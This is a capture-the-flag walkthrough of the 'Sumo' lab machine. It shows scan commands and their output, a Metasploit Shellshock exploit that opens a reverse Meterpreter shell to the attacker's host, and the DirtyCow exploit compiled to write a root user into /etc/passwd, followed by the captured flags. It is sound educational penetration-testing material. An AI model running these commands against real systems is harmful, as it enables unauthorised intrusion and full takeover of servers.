Proving Grounds: Sumo Walkthrough
Machine Stats
Name
Sumo
OS
Ubuntu Linux 12.04
Rating
Easy
Enumeration
I started by running my standard nmap scan..
└─$ nmap -A -T4 -p- 192.168.195.87
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 22:10 EDT
Nmap scan report for 192.168.195.87
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
| 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 secondsHere we can see an open web server. I run a gobuster directory enumeration scan but don’t seem to return anything too interesting on the surface.
└─$ gobuster dir -u http://192.168.195.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/index (Status: 200) [Size: 177]
/server-status (Status: 403) [Size: 295]I like to scan all webservers with Nikto secondarily, so I gave this a shot. (extraneous information removed below, denoted with <..> markers)
└─$ nikto -h 192.168.195.87
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.195.87
+ Target Hostname: 192.168.195.87
+ Target Port: 80
+ Start Time: 2022-03-22 22:13:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020
<..>
+ OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
<..>
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2022-03-22 22:18:58 (GMT-4) (301 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedUser Account
Alright, well I am feeling lazy so I’m going to use Metasploit for this. I wanted the exploit with the best reliability, and chose this one, rated “excellent”:
msfconsole
msf6 > search shellshock
<..>
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
<..>
msf6 > use 1
I wanted the exploit with the best reliability so I chose the following module, rated “excellent” and set the following options:
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0
lhost => tun0
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test.
TARGETURI => /cgi-bin/test.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 192.168.195.87
rhost => 192.168.195.87
I crossed my fingers and ran the dang thing.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 192.168.49.195:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (989032 bytes) to 192.168.195.87
[*] Meterpreter session 1 opened (192.168.49.195:4444 -> 192.168.195.87:44683 ) at 2022-03-22 22:23:39 -0400
meterpreter > getuid
Server username: www-data
I wanted to get some info about the system, bring over my linpeas.sh script for enumerating weaknesses and exploits, and also grab the low privilege user flag.
meterpreter > sysinfo
Computer : 192.168.195.87
OS : Ubuntu 12.04 (Linux 3.2.0-23-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > upload /var/www/html/linpeas.sh /tmp
[*] uploading : /var/www/html/linpeas.sh -> /tmp
[*] uploaded : /var/www/html/linpeas.sh -> /tmp/linpeas.sh
meterpreter > download ./local.txt
[*] Downloading: ./local.txt -> /home/me/local.txt
[*] Downloaded 33.00 B of 33.00 B (100.0%): ./local.txt -> /home/me/local.txt
[*] download : ./local.txt -> /home/me/local.txt
└─$ cat local.txt
27ebb54576d99c4fe58fea8a02ed4c29
Privilege Escalation & Root Flag
Checking out the linpeas output, I noticed immediately that the machine was vulnerable against the infamous dirtycow privilege escalation route. I was also kind of surprised to not find a working Metasploit module for this one. There was a litany of other potential vulnerabilities but I knew the name of this one already, so figured it was probably the way to go here.
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
I confirmed the victim machine was running GCC to compile the exploit C code and then backgrounded my session to drop back to meterpreter.
meterpreter > upload /usr/share/exploitdb/exploits/linux/local/40839.c /tmp
[*] uploading : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp
[*] uploaded : /usr/share/exploitdb/exploits/linux/local/40839.c -> /tmp/40839.c
I then went back to my system shell via the session I just backgrounded and began running the exploit as described in the Exploit DB page.
gcc -pthread 40839.c -o dirty -lcrypt
./dirty
I set the password to “test” and waited for the exploit to continue.
Please enter the new password: test
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: 7f01a3ef0000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'test'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: 7f01a3ef0000
madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'test'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Browsing the exploit code, I can see that the username being created here is firefart. I opened a new terminal and SSH’ed to the victim machine as this user, with the password I just set. (test)
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
firefart@ubuntu:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntu:~# cat /root/proof.txt
19364e26117c54edc20b6fa5eadd0fa5I submitted this flag and it was accepted.